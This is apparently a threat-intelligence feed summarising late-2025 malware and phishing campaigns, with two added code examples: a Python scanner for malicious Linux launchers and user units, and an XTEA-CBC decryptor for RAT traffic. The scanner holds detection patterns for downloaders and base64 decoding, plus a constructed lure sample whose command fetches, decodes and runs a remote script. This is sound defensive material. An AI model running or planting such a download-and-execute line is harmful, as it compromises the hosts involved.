Researchers at Insikt Group have identified an extensive network of companies and individuals connected to Intellexa and its flagship Predator spyware, revealing a persistent global ecosystem supporting surveillance-for-hire operations. The investigation exposes a complex web of front companies, intermediaries, and infrastructure spanning Europe, the Middle East, and Africa, with active entities registered in Greece, North Macedonia, the Czech Republic, and the United Arab Emirates. Predator is a modular spyware framework capable of full device compromise through both one-click and zero-click exploits, granting operators access to sensitive device data including messages, calls, and camera feeds. Insikt Group’s analysis shows that despite sanctions, exposure, and legal scrutiny, Intellexa-linked companies continue to operate under new identities and regional affiliates to obscure attribution and sustain commercial activity.
Source: https://www.recordedfuture.com/research/intellexas-global-corporate-web
2025-12-06
Executive_Award_Campaign
MEDIUM
+
Intel Source:
Spider Labs
Intel Name:
Executive_Award_Campaign
Date of Scan:
2025-12-06
Impact:
MEDIUM
Summary:
Researchers at SpiderLabs have uncovered a phishing campaign that uses an “Executive Award” theme to lure victims into credential theft and malware installation. The operation begins with emails claiming to relate to a corporate recognition or gift-card program, directing users to a convincing phishing site that mimics an internal award or webmail portal. When victims submit their credentials, the data is immediately exfiltrated to attacker-controlled infrastructure, including a Telegram channel. The site then displays a fake browser error and prompts users to download a supposed “fix” file, leveraging the ClickFix technique to execute concealed PowerShell code via Windows messaging features. This PowerShell stage ultimately downloads and installs the Stealerium information stealer, which operates silently to harvest additional data and establish persistence for long-term access.
Source: https://x.com/SpiderLabs/status/1995639456028926169
2025-12-05
A_Misuse_of_Velociraptor
MEDIUM
+
Intel Source:
Huntress
Intel Name:
A_Misuse_of_Velociraptor
Date of Scan:
2025-12-05
Impact:
MEDIUM
Summary:
Researchers at Huntress uncovered an espionage campaign in which a threat actor abused the Velociraptor DFIR platform and other legitimate administrative tools to establish covert C2 across multiple victim environments. The actor initially breached networks by exploiting vulnerable Windows web services, then installed Velociraptor as a persistent service with elevated privileges. After gaining a foothold, they relied on cloud tunneling services, remote desktop utilities, and encoded PowerShell to move laterally, enumerate Active Directory, and execute arbitrary commands while closely mimicking normal administrative activity. In one instance, the intrusion culminated in the deployment of Warlock ransomware, with Velociraptor enabling continued access during and following the encryption event. Confirmed victims include an agriculture organization, a managed service provider’s internal network, and another enterprise.
Source: https://www.huntress.com/blog/velociraptor-misuse-part-two-eye-of-the-storm
2025-12-05
V3G4_Botnet_Evolves
MEDIUM
+
Intel Source:
Cyble
Intel Name:
V3G4_Botnet_Evolves
Date of Scan:
2025-12-05
Impact:
MEDIUM
Summary:
Cyble researchers have identified a new campaign by V3G4, a Mirai-based botnet that has evolved beyond its usual DDoS attacks to secretly run cryptomining on compromised Linux devices. The operation uses a multi-stage infection chain, beginning with a downloader script designed to work across many CPU architectures, making it effective against a wide range of servers and embedded systems. Once inside, it deploys a custom bot that gathers system details, manipulates system services, and establishes resilient communication with its C2 servers. The malware also performs TCP scanning and uses DNS-based C2 resolution, enabling it to discover additional targets and remain connected even if the attackers update their infrastructure. In later stages, the operators deploy a fileless cryptominer whose configuration is delivered at runtime, leaving minimal traces on disk and complicating forensic analysis.
Source: https://cyble.com/blog/v3g4-mirai-botnet-evolves/
2025-12-04
Phishing_Campaign_Masquerades_Italy_Presidency_Website
MEDIUM
+
Intel Source:
Cert-AGID
Intel Name:
Phishing_Campaign_Masquerades_Italy_Presidency_Website
Date of Scan:
2025-12-04
Impact:
MEDIUM
Summary:
CERT-AGID researchers have identified a phishing campaign that impersonates the Italian Government and the Presidency of the Council of Ministers to harvest online banking credentials. The operation begins with emails titled “Verification of Banking Data – Italian Government,” urging recipients to click a link presented as part of a routine administrative check. The embedded link directs victims to a webpage that replicates the official branding and visual identity of the Presidency, creating a strong sense of legitimacy. From there, users are presented with a bank selection drop-down listing numerous national and international credit institutions, after which they are redirected to a counterfeit portal for the chosen bank. These fraudulent portals closely mimic legitimate online banking login pages to capture customer IDs, PINs, and passwords. The campaign relies on brand impersonation and high-quality visual replicas rather than malware, reducing technical complexity while still posing a significant fraud risk.
Source: https://cert-agid.gov.it/news/in-atto-una-campagna-di-phishing-che-sfrutta-le-insegne-del-governo-per-sottrarre-dati-bancari/
2025-12-04
matanbuchus_3_0_modular_downloader_with_ransomware_aligned_capabilities
LOW
+
Intel Source:
Zscaler
Intel Name:
matanbuchus_3_0_modular_downloader_with_ransomware_aligned_capabilities
Date of Scan:
2025-12-04
Impact:
LOW
Summary:
Researchers at Zscaler ThreatLabz have identified a new and more advanced variant of the Matanbuchus Malware-as-a-Service platform, marking a substantial evolution in its deployment and post-exploitation capabilities. Matanbuchus 3.0 introduces enhanced obfuscation, Protobuf-based C2 communication, and long-running anti-analysis delays, making it significantly harder to detect. Recent intrusions show threat actors using Quick Assist–enabled access to deploy trojanized MSI installers that sideload the downloader module, which then retrieves the main payload from attacker infrastructure. The updated variant expands its ability to execute EXEs, DLLs, MSI packages, and shellcode through multiple injection pathways while establishing persistence via scheduled tasks. These advancements strengthen its utility for ransomware-aligned operators and increase its impact across Windows environments.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-matanbuchus-3-0#indicators-of-compromise--iocs-
2025-12-04
DigitStealer_MacOS_Infostealer
HIGH
+
Intel Source:
Polyswarm
Intel Name:
DigitStealer_MacOS_Infostealer
Date of Scan:
2025-12-04
Impact:
HIGH
Summary:
Researchers at PolySwarm have uncovered a new macOS malware family named DigitStealer, a multi-stage information stealer that leverages JavaScript for Automation (JXA) and AppleScript to evade detection and exfiltrate sensitive data. The campaign distributes unsigned disk images masquerading as legitimate macOS utilities, using bash and curl commands to execute the payload entirely in memory. Once executed, the malware carries out comprehensive hardware, regional, and anti-virtualization checks to ensure it runs exclusively on physical Apple Silicon systems, with a particular focus on M2 and newer chips. DigitStealer advances through four structured stages, including an AppleScript-driven credential harvester, an obfuscated JXA module for broader data theft, a tampered Ledger Live component designed for cryptocurrency exfiltration, and a persistent backdoor established via a LaunchAgent.
Source: https://blog.polyswarm.io/digitstealer-macos-infostealer
2025-12-03
Operation_DupeHike
MEDIUM
+
Intel Source:
Seqrite
Intel Name:
Operation_DupeHike
Date of Scan:
2025-12-03
Impact:
MEDIUM
Summary:
Researchers at Seqrite have uncovered an espionage campaign called Operation DupeHike, in which the threat group UNG0902 targets employees in Russian organizations, especially those working in HR, payroll, and internal administration. The attackers send a ZIP file containing a malicious shortcut file disguised as an internal bonus-policy document. When executed, it triggers a PowerShell downloader that retrieves a C++ implant named DUPERUNNER while showing the victim a legitimate-looking PDF to avoid suspicion. DUPERUNNER gathers system details, chooses a suitable process for injection, and then loads a stager that deploys an AdaptixC2 beacon directly in memory. This beacon uses encrypted HTTP communications, dynamic API resolution, custom hashing, and reflective loading to evade detection, while also collecting and exfiltrating local data to attacker infrastructure. The operation relies on user interaction and living-off-the-land techniques, making it more effective at bypassing basic security controls. The campaign has been active since at least November 2025 and focuses on information theft rather than immediate disruption.
Source: https://www.seqrite.com/blog/9512-2/
2025-12-03
Salty2FA_and_Tycoon2FA
MEDIUM
+
Intel Source:
Any.Run
Intel Name:
Salty2FA_and_Tycoon2FA
Date of Scan:
2025-12-03
Impact:
MEDIUM
Summary:
Researchers at ANY.RUN have identified a new hybrid phishing campaign that combines two well-known phishing-as-a-service kits: Salty2FA and Tycoon2FA. Although Salty2FA activity had recently declined, attackers are now integrating components from both toolkits within the same operation. The campaign uses Salty-style login and MFA pages on the front end, while captured data is routed to a Tycoon2FA-like backend. This hybrid design aims to steal enterprise login credentials and MFA codes, enabling attackers to compromise accounts and move deeper into networks. To maintain resilience, the phishing infrastructure relies on low-cost hosting, CDNs, and rapidly rotating domains that remain active even as defenders attempt to block them. For victims, the pages appear highly convincing, while obfuscated JavaScript performs anti-analysis checks, dynamically loads additional stages, and falls back to alternate servers if needed.
Source: https://any.run/cybersecurity-blog/salty2fa-tycoon2fa-hybrid-phishing-2025/
2025-12-03
ShadyPanda_Malware_Campaign
MEDIUM
+
Intel Source:
Koi Security
Intel Name:
ShadyPanda_Malware_Campaign
Date of Scan:
2025-12-03
Impact:
MEDIUM
Summary:
Koi Security has uncovered a long-running campaign by the threat actor ShadyPanda, which has been abusing Chrome and Edge extensions for years to conduct large-scale surveillance. The group compromises legitimate, highly rated extensions by delivering delayed malicious updates, causing users to unknowingly install the malware through normal auto-updates. Over time, their tools have evolved from simple ad-fraud extensions to sophisticated spyware and browser-based backdoors capable of executing attacker-controlled code directly inside the browser. The latest payload runs hourly, provides full programmatic access to browser APIs, and can dynamically shift between ad fraud, credential theft, and corporate espionage. It gathers browsing history, search queries, interaction telemetry, and device fingerprints, and can intercept sessions and credentials using malicious service workers. Because the attack operates entirely within the browser, it effectively bypasses traditional endpoint and email security controls.
Source: https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign
2025-12-02
Arkanix_Stealer
MEDIUM
+
Intel Source:
G-Data
Intel Name:
Arkanix_Stealer
Date of Scan:
2025-12-02
Impact:
MEDIUM
Summary:
Researchers at G DATA have uncovered Arkanix, a new information-stealing malware being sold online for quick profit. The operators openly promote it on social platforms and distribute it as seemingly legitimate tools within gaming and social communities. The malware comes in two versions—one written in Python and another in C++. The Python version downloads its active payload from a remote server and can even spread itself by sending messages through chat platforms. Both versions steal a wide range of data, including browser passwords and sessions, cryptocurrency wallet information, VPN and Steam accounts, Wi-Fi details, Telegram data, screenshots, and general system information. The C++ build is more advanced and injects into Chromium-based browsers to bypass newer cookie protection features and extract encrypted data. Everything stolen is sent back to servers controlled by the attackers so the data can be quickly sold or used for account takeovers.
Source: https://www.gdatasoftware.com/blog/2025/12/38306-arkanix-stealer
2025-12-02
APT_C_35_Targets_Pakistani_Agencies
HIGH
+
Intel Source:
360 Threat Intelligence Center
Intel Name:
APT_C_35_Targets_Pakistani_Agencies
Date of Scan:
2025-12-02
Impact:
HIGH
Summary:
Researchers at 360 Threat Intelligence Center have observed that the South Asian APT group APT-C-35 (Brain Worm, also known as Donot) has launched a new campaign targeting government entities in Pakistan using a remote access Trojan (RAT) called ShadowAgent. The campaign begins with phishing emails containing ZIP attachments with decoy PDFs and executables disguised with PDF icons to deceive recipients into execution. Once executed, ShadowAgent decrypts its configuration from an internal resource segment, establishes persistence via a scheduled task, and collects host identifiers, usernames, and security product information before exfiltrating data to a remote server over HTTP/WebSocket. The C2 infrastructure allows remote command execution through JSON over WebSocket, supporting shell interaction, file transfer, and directory traversal. A related downloader, linked through previously used digital certificates, employs AES and Base64 encryption, stages persistence via system processes, and communicates with the same C2 framework. The campaign's tactics, encryption methods, and reuse of code, certificates, and infrastructure clearly tie it to APT-C-35. The campaign focuses on government institutions, uses themed decoys, and targets defense and administrative data.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507603&idx=1&sn=af41be456f6393a24771846328e8d7f2&poc_token=HMJjLWmjkDO24TTMzmHt6KR5LQFHyZH1Pxh11B8p
2025-12-01
Malicious_VS_Code_Extension_Used_in_Supply_Chain_Attack
HIGH
+
Intel Source:
Nextron Systems
Intel Name:
Malicious_VS_Code_Extension_Used_in_Supply_Chain_Attack
Date of Scan:
2025-12-01
Impact:
HIGH
Summary:
Researchers at Nextron Systems have analyzed a malicious Visual Studio Code extension impersonating 'Material Icon Theme' (version 5.29.1) that contained two Rust-based implants targeting both Windows and macOS, activated immediately upon extension launch through a loader script crafted to resemble legitimate files. The implants employed an unconventional command-and-control technique by pulling encrypted instructions from a Solana blockchain wallet, a method previously observed in the GlassWorm campaign, before decoding the commands and retrieving a second-stage payload from a remote command server, with a Google Calendar event serving as a fallback delivery mechanism. These follow-on payloads consisted of AES-256-CBC–encrypted JavaScript blobs.
Source: https://www.nextron-systems.com/2025/11/29/analysis-of-the-rust-implants-found-in-the-malicious-vs-code-extension/
2025-12-01
APT36_Launches_New_Linux_Espionage
HIGH
+
Intel Source:
CYFIRMA
Intel Name:
APT36_Launches_New_Linux_Espionage
Date of Scan:
2025-12-01
Impact:
HIGH
Summary:
Researchers at CYFIRMA have identified a new APT36 (Transparent Tribe) cyber-espionage campaign targeting Indian government entities using Python-based ELF malware designed for Linux systems. The actor, associated with Pakistan, demonstrates growing technical maturity and dual-platform capability through tailored payloads for both Windows and Linux, including distributions commonly used in Indian government environments. The attack begins with spear-phishing emails delivering weaponized .desktop shortcut files disguised as legitimate documents. Once executed, these files decode a hidden Base64 payload, display a benign decoy PDF, and download additional malicious components from attacker-controlled infrastructure. The retrieved payloads establish persistence via systemd user services and deploy a Python-compiled RAT capable of file exfiltration, remote shell execution, screenshot capture, and arbitrary Python code execution. Static analysis shows the RAT was built with PyInstaller and incorporates cross-platform C2 communications over HTTP POST, zip-based data exfiltration, hidden working directories, and self-destruct routines to erase forensic evidence.
Source: https://www.cyfirma.com/research/apt36-python-based-elf-malware-targeting-indian-government-entities/
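The chain above (a .desktop launcher posing as a document, a Base64-decoded stage, a hidden working directory, a systemd user unit for persistence) leaves artifacts in user-writable locations that are cheap to hunt. The following is an added example, not code from CYFIRMA or from the campaign: it parses .desktop files and systemd user units and flags the Exec/ExecStart lines that carry those traits. The indicator patterns, the sample files and the paths are constructed assumptions for illustration, not signatures for the APT36 samples.

```python
import glob
import os
import pathlib
import re
from dataclasses import dataclass, field

# Generic traits of launcher-style lures and the user units they drop.
# Assumption: illustrative indicators, not signatures for the APT36 samples.
SUSPICIOUS_PATTERNS = {
    "base64_decode": re.compile(r"\bbase64\s+(-d\b|--decode\b)"),
    "downloader":    re.compile(r"\b(curl|wget)\b"),
    "shell_wrapper": re.compile(r"\b(sh|bash|dash)\s+-c\b"),
    "python_inline": re.compile(r"\bpython3?\s+-c\b"),
    "hidden_dir":    re.compile(r"(^|[\s/=\"'])\.\w+/"),   # runs from or writes into a dot-directory
    "self_delete":   re.compile(r"\brm\s+-[rf]{1,2}\s"),
}

@dataclass
class Finding:
    path: str
    command: str
    reasons: list = field(default_factory=list)

def parse_section(text, wanted):
    """Tolerant INI reader: {key: value} for the first section named `wanted`.
    It never raises, so a deliberately malformed file cannot dodge the scan."""
    values, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            continue
        if current == wanted and "=" in line:
            key, _, val = line.partition("=")
            values.setdefault(key.strip(), val.strip())
    return values

def _match(command):
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(command)]

def inspect_desktop(path, text):
    entry = parse_section(text, "Desktop Entry")
    command = entry.get("Exec", "")
    reasons = _match(command)
    # A launcher dressed as a document: Type=Application with a PDF/office icon or a
    # Name carrying a document extension (the lure never has to be a real PDF).
    icon, name = entry.get("Icon", "").lower(), entry.get("Name", "").lower()
    if entry.get("Type") == "Application" and (
        any(k in icon for k in ("pdf", "document", "office")) or name.endswith((".pdf", ".doc", ".docx"))
    ):
        reasons.append("document_disguise")
    if reasons and entry.get("Terminal", "false").lower() == "false":
        reasons.append("silent_terminal")   # real command stays invisible while the decoy opens
    return Finding(path, command, reasons) if reasons else None

def inspect_user_unit(path, text):
    service = parse_section(text, "Service")
    command = service.get("ExecStart", "")
    reasons = _match(command)
    if reasons and service.get("Restart", "no") in ("always", "on-failure"):
        reasons.append("restart_always")    # keeps the implant alive across crashes/kills
    return Finding(path, command, reasons) if reasons else None

def scan(files):
    """files: {path: contents}. Returns one Finding per suspicious launcher or unit."""
    findings = []
    for path, text in files.items():
        check = (inspect_desktop if path.endswith(".desktop")
                 else inspect_user_unit if path.endswith(".service") else None)
        hit = check(path, text) if check else None
        if hit:
            findings.append(hit)
    return findings

def scan_host(home=os.path.expanduser("~")):
    """Read the usual user-writable launcher and unit locations from disk and scan them."""
    paths = [p for g in ("/.config/systemd/user/*.service", "/.config/autostart/*.desktop",
                         "/.local/share/applications/*.desktop", "/Desktop/*.desktop")
             for p in glob.glob(home + g)]
    return scan({p: pathlib.Path(p).read_text(errors="replace") for p in paths})

# Constructed samples (not real APT36 artifacts): one benign and one suspicious of each kind.
SAMPLES = {
    "/home/u/.local/share/applications/firefox.desktop":
        "[Desktop Entry]\nType=Application\nName=Firefox\nIcon=firefox\nExec=/usr/bin/firefox %u\nTerminal=false\n",
    "/home/u/Downloads/Meeting_Notice.pdf.desktop":
        "[Desktop Entry]\nType=Application\nName=Meeting_Notice.pdf\nIcon=application-pdf\nTerminal=false\n"
        "Exec=bash -c \"curl -s http://203.0.113.5/p | base64 -d > /tmp/.cfg/run.sh; "
        "xdg-open /tmp/.cfg/decoy.pdf; bash /tmp/.cfg/run.sh; rm -f /tmp/.cfg/run.sh\"\n",
    "/home/u/.config/systemd/user/pipewire.service":
        "[Unit]\nDescription=PipeWire\n[Service]\nExecStart=/usr/bin/pipewire\nRestart=on-failure\n",
    "/home/u/.config/systemd/user/gnome-session-helper.service":
        "[Unit]\nDescription=GNOME Session Helper\n[Service]\n"
        "ExecStart=/bin/sh -c \"python3 /home/u/.cache/.gsh/agent\"\nRestart=always\n"
        "[Install]\nWantedBy=default.target\n",
}

if __name__ == "__main__":
    for f in scan(SAMPLES) + scan_host():
        print(f"{f.path}\n  {f.command}\n  reasons: {', '.join(f.reasons)}")
```

Run it as the user whose home directory you are examining; `scan_host()` only covers the per-user locations, so extend the glob list for system-wide units or autostart directories. A hit on `hidden_dir` alone is weak (many benign tools live under `~/.cache`), which is why the unit check only escalates `Restart=` when another trait is present.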
2025-11-30
ShadowV2_Targeting_IoT_Devices
MEDIUM
Intel Source:
Fortinet
Intel Name:
ShadowV2_Targeting_IoT_Devices
Date of Scan:
2025-11-30
Impact:
MEDIUM
Summary:
FortiGuard researchers have identified ShadowV2, a new Mirai-based botnet targeting publicly exposed IoT devices. The operators exploit several known vulnerabilities in DD-WRT, D-Link, and TP-Link firmware to gain remote code execution and deploy an initial downloader that subsequently retrieves the main ShadowV2 binary. Once executed, the malware initializes XOR-obfuscated configuration data containing file paths, HTTP headers, and user-agent strings designed to mimic legitimate web traffic. ShadowV2 supports UDP, TCP, and HTTP-based flooding techniques, with attack routines dynamically triggered using numeric method IDs issued by the C2 server. Ongoing activity shows widespread scanning and exploitation across the Americas, Europe, Africa, and Oceania, reflecting an effort to build a large, globally distributed botnet. Compromised devices can be used for high-volume DDoS attacks and may also function as proxies or entry points for lateral movement into internal networks.
Source: https://www.fortinet.com/blog/threat-research/shadowv2-casts-a-shadow-over-iot-devices
2025-11-30
FlexibleFerret_macOS_Job_Scam_Malware
HIGH
Intel Source:
Jamf
Intel Name:
FlexibleFerret_macOS_Job_Scam_Malware
Date of Scan:
2025-11-30
Impact:
HIGH
Summary:
Researchers at Jamf Threat Labs have identified a renewed campaign involving the FlexibleFerret malware family, a macOS-targeting threat attributed to DPRK-aligned operators. The operation leverages fake job recruitment websites and LinkedIn posts to trick victims into running attacker-supplied Terminal commands during supposed hiring assessments. Once executed, these commands initiate a multi-stage infection chain that installs a malicious shell script and a Golang-based backdoor. The malware establishes persistence through LaunchAgents, deploys a decoy application mimicking Chrome to harvest credentials, and abuses legitimate APIs for exfiltration. The campaign demonstrates refined social engineering capabilities designed to bypass macOS Gatekeeper protections and blend into normal user behavior.
Source: https://www.jamf.com/blog/flexibleferret-malware-continues-to-adapt/
2025-11-29
TAG_150_Modular_Loader_RAT_Campaign
HIGH
Intel Source:
Darktrace
Intel Name:
TAG_150_Modular_Loader_RAT_Campaign
Date of Scan:
2025-11-29
Impact:
HIGH
Summary:
Researchers at Darktrace have identified an ongoing campaign operated by the TAG-150 group, a Malware-as-a-Service (MaaS) provider active since March 2025. TAG-150 employs two primary malware families, CastleLoader and CastleRAT, to deliver, stage, and execute malicious payloads across enterprise networks. CastleLoader functions as a modular loader, capable of downloading and executing secondary payloads via deceptive web domains and GitHub-hosted repositories, while CastleRAT operates as a remote access trojan enabling command execution, keylogging, and data theft. The campaign’s architecture demonstrates a deliberate separation between delivery and execution phases, enhancing operational resilience and evasion capabilities. Darktrace analysts observed TAG-150 leveraging multi-stage infection chains, including fake software update prompts and embedded shellcode, to compromise targets primarily within the United States.
Source: https://www.darktrace.com/blog/castleloader-castlerat-behind-tag150s-modular-malware-delivery-system
2025-11-29
Black_Friday_Brand_Impersonation_Lures
MEDIUM
Intel Source:
Darktrace
Intel Name:
Black_Friday_Brand_Impersonation_Lures
Date of Scan:
2025-11-29
Impact:
MEDIUM
Summary:
Darktrace researchers have observed a significant rise in sophisticated phishing campaigns during the Black Friday period, with attackers aggressively using brand impersonation and urgent promotional themes. These campaigns revolve around highly convincing emails that imitate major consumer and luxury brands to steal credentials or redirect victims to fraudulent sites. Threat actors leverage well-crafted subject lines about exclusive deals and limited-time offers to entice users. They also take advantage of newly registered domains and third-party hosting services to evade traditional email security and reputation-based filtering. The emails are carefully designed to mirror legitimate marketing communications, replicating real brand layouts, colour palettes, and call-to-action elements.
Source: https://www.darktrace.com/blog/from-amazon-to-louis-vuitton-how-darktrace-detects-black-friday-phishing-attacks
2025-11-29
Shai_Hulud_2_0
MEDIUM
Intel Source:
Netskope
Intel Name:
Shai_Hulud_2_0
Date of Scan:
2025-11-29
Impact:
MEDIUM
Summary:
Netskope researchers have uncovered Shai-Hulud 2.0, an aggressive and automated npm supply-chain campaign that compromises developers’ GitHub accounts and tokens to mass-publish malicious packages. Once installed, the malware deploys multi-stage payloads that collect environment details, cloud secrets, and authentication material from developer workstations and CI pipelines. It then uses this access to backdoor GitHub workflows and npm projects, enabling lateral movement across organisations. Active since mid-September 2025, Shai-Hulud 2.0 has already infected hundreds of npm packages, with attackers continually pushing new trojanized versions even after maintainers attempt remediation. By stealing cloud secrets and local configuration data, the malware creates opportunities for further cloud account breaches and long-term persistence within GitHub organisations.
Source: https://www.netskope.com/blog/shai-hulud-2-0-aggressive-automated-one-of-fastest-spreading-npm-supply-chain-attacks-ever-observed
2025-11-29
Operation_Hanoi_Thief
MEDIUM
Intel Source:
Seqrite
Intel Name:
Operation_Hanoi_Thief
Date of Scan:
2025-11-29
Impact:
MEDIUM
Summary:
Seqrite Labs has identified a focused spear-phishing campaign, dubbed Operation Hanoi Thief, targeting Vietnamese IT professionals and recruitment teams. The attackers deliver a multi-stage info-stealer known as LOTUSHARVEST through a malicious ZIP file containing a résumé-themed LNK shortcut embedded within a pseudo-polyglot lure that also functions as a batch script. Once triggered, the LNK leverages Windows LOLBINs and a scripted execution chain to drop a malicious DLL and enable DLL sideloading via a copied ctfmon.exe. The final payload focuses on browser data theft rather than encryption or destruction. The malware includes anti-analysis logic such as debugger checks and fake exception handling to evade sandboxing and reverse engineering. It targets Chromium-based browsers, harvesting history and saved credentials from local SQLite databases and decrypting them with Windows APIs. The stolen data is packaged together with host identifiers in JSON format and exfiltrated over port 443 to attacker-controlled infrastructure via standard WinINet APIs.
Source: https://www.seqrite.com/blog/9479-2/
2025-11-28
Fog_Ransomware_APT_Style_Double_Extortion
HIGH
Intel Source:
Picus Security
Intel Name:
Fog_Ransomware_APT_Style_Double_Extortion
Date of Scan:
2025-11-28
Impact:
HIGH
Summary:
Researchers at Picus Security have identified Fog ransomware as a rapidly evolving cyber threat that blends ransomware operations with espionage-style tactics typically seen in advanced persistent threat (APT) groups. Emerging in early 2024, the group initially targeted education and recreation sectors in the United States before expanding to high-value financial institutions in Asia by mid-2025. Fog employs a multi-stage attack lifecycle that includes exploitation of remote access vulnerabilities, credential theft, and phishing campaigns delivering malicious PowerShell loaders. Following initial access, the operators conduct extensive network reconnaissance, privilege escalation through driver-level exploits, and lateral movement using legitimate administration tools.
Source: https://www.picussecurity.com/resource/blog/fog-ransomware-2025-deep-dive-into-ttps
2025-11-28
ScoringMathTea_RAT_Targets_UAV_Defense_Contractors
HIGH
Intel Source:
Polyswarm
Intel Name:
ScoringMathTea_RAT_Targets_UAV_Defense_Contractors
Date of Scan:
2025-11-28
Impact:
HIGH
Summary:
PolySwarm researchers have uncovered that North Korea’s Lazarus Group is deploying a previously undocumented C++ remote-access trojan (RAT) dubbed ScoringMathTea as part of an updated phase of Operation DreamJob, internally referred to as “Gotta Fly.” This campaign is designed to exfiltrate sensitive UAV-related technology from defense contractors supporting Ukraine. ScoringMathTea is a fully in-memory RAT that employs dynamic API loading, encrypted strings, reflective DLL injection, and other stealth techniques to evade detection. The malware communicates with its C2 servers over HTTP/S using TEA/XTEA-CBC encryption, spoofed browser identifiers, and fake HTML error pages to mimic legitimate web traffic. The tool demonstrates strong operational discipline, featuring runtime-only decryption, custom obfuscation layers, and API hashing. Overall, the discovery highlights Lazarus Group’s continued investment in stealthy, espionage-focused tooling designed for high-value intelligence collection.
Source: https://blog.polyswarm.io/lazarus-groups-scoringmathtea-rat
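The summary names TEA/XTEA in CBC mode as the transport cipher. An analyst writing a traffic decryptor for a sample like this needs the block cipher and the chaining in a form that is easy to adapt once the key, word order and round count have been pulled from the binary. The following is an added example, not code from PolySwarm or from the malware: a straightforward XTEA implementation with CBC and PKCS#7 padding on 8-byte blocks. Little-endian word order, 32 rounds and PKCS#7 padding are assumptions to be confirmed against the sample; the beacon text is constructed.

```python
MASK = 0xFFFFFFFF
DELTA = 0x9E3779B9
BLOCK = 8       # XTEA encrypts 64-bit blocks
ROUNDS = 32     # reference value; malware builds sometimes change it

def _words(key: bytes):
    # 128-bit key as four 32-bit words. Assumption: little-endian, which is what
    # x86 C code that casts the key buffer to uint32_t* produces.
    if len(key) != 16:
        raise ValueError("XTEA needs a 16-byte key")
    return [int.from_bytes(key[i:i + 4], "little") for i in range(0, 16, 4)]

def xtea_encrypt_block(block: bytes, key: bytes, rounds: int = ROUNDS) -> bytes:
    k = _words(key)
    v0, v1 = int.from_bytes(block[:4], "little"), int.from_bytes(block[4:8], "little")
    s = 0
    for _ in range(rounds):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK
    return v0.to_bytes(4, "little") + v1.to_bytes(4, "little")

def xtea_decrypt_block(block: bytes, key: bytes, rounds: int = ROUNDS) -> bytes:
    k = _words(key)
    v0, v1 = int.from_bytes(block[:4], "little"), int.from_bytes(block[4:8], "little")
    s = (DELTA * rounds) & MASK          # start from the final key-schedule sum and walk back
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & MASK
    return v0.to_bytes(4, "little") + v1.to_bytes(4, "little")

def _pad(data: bytes) -> bytes:          # PKCS#7 over 8-byte blocks (assumption)
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def _unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding: wrong key, wrong IV or truncated data")
    return data[:-n]

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def xtea_cbc_encrypt(plaintext: bytes, key: bytes, iv: bytes) -> bytes:
    if len(iv) != BLOCK:
        raise ValueError("IV must be 8 bytes")
    padded, out, prev = _pad(plaintext), bytearray(), iv
    for i in range(0, len(padded), BLOCK):
        prev = xtea_encrypt_block(_xor(padded[i:i + BLOCK], prev), key)   # chain on ciphertext
        out += prev
    return bytes(out)

def xtea_cbc_decrypt(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    if not ciphertext or len(ciphertext) % BLOCK:
        raise ValueError("ciphertext length must be a non-zero multiple of 8")
    out, prev = bytearray(), iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out += _xor(xtea_decrypt_block(cur, key), prev)
        prev = cur
    return _unpad(bytes(out))

if __name__ == "__main__":
    # Constructed beacon; key and IV are placeholders, not values from the sample.
    key, iv = bytes(range(16)), bytes.fromhex("0011223344556677")
    beacon = b'{"id":"host-1","cmd":"sleep","arg":60}'
    ct = xtea_cbc_encrypt(beacon, key, iv)
    print(ct.hex())
    print(xtea_cbc_decrypt(ct, key, iv))
```

When porting this to a real sample, check three things in the disassembly before trusting any output: whether the implementation is TEA (a fixed 64 cycles with `key[0..3]` used in a fixed order) or XTEA (the `sum`-indexed key selection shown here), the byte order used when the 32-bit words are loaded, and where the IV comes from (a fixed value in the binary, a per-message prefix, or derived from the session). A padding error on decrypt almost always means one of those three is wrong rather than a corrupt capture.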
2025-11-28
Water_Gamayun_Campaign
HIGH
Intel Source:
Zscaler
Intel Name:
Water_Gamayun_Campaign
Date of Scan:
2025-11-28
Impact:
HIGH
Summary:
Zscaler has identified a new Water Gamayun campaign that leverages a compromised BELAY Solutions webpage and a newly registered domain to deliver a RAR archive masquerading as a PDF. The operators exploit the MSC EvilTwin vulnerability (CVE-2025-26633) to inject malicious code into mmc.exe, using the trusted Windows binary to execute multiple concealed PowerShell stages. The attack chain employs layered obfuscation, password-protected payloads, and C#-based process-hiding techniques, ultimately deploying multi-stage backdoors and stealers such as SilentPrism, DarkWisp, EncryptHub, and Rhadamanthys. The final loader, ItunesC.exe, is designed for persistence, credential theft, and further payload delivery.
Source: https://www.zscaler.com/blogs/security-research/water-gamayun-apt-attack
2025-11-27
Tycoon_2FA_AiTM_Phishing_as_a_Service
HIGH
Intel Source:
Cyfirma
Intel Name:
Tycoon_2FA_AiTM_Phishing_as_a_Service
Date of Scan:
2025-11-27
Impact:
HIGH
Summary:
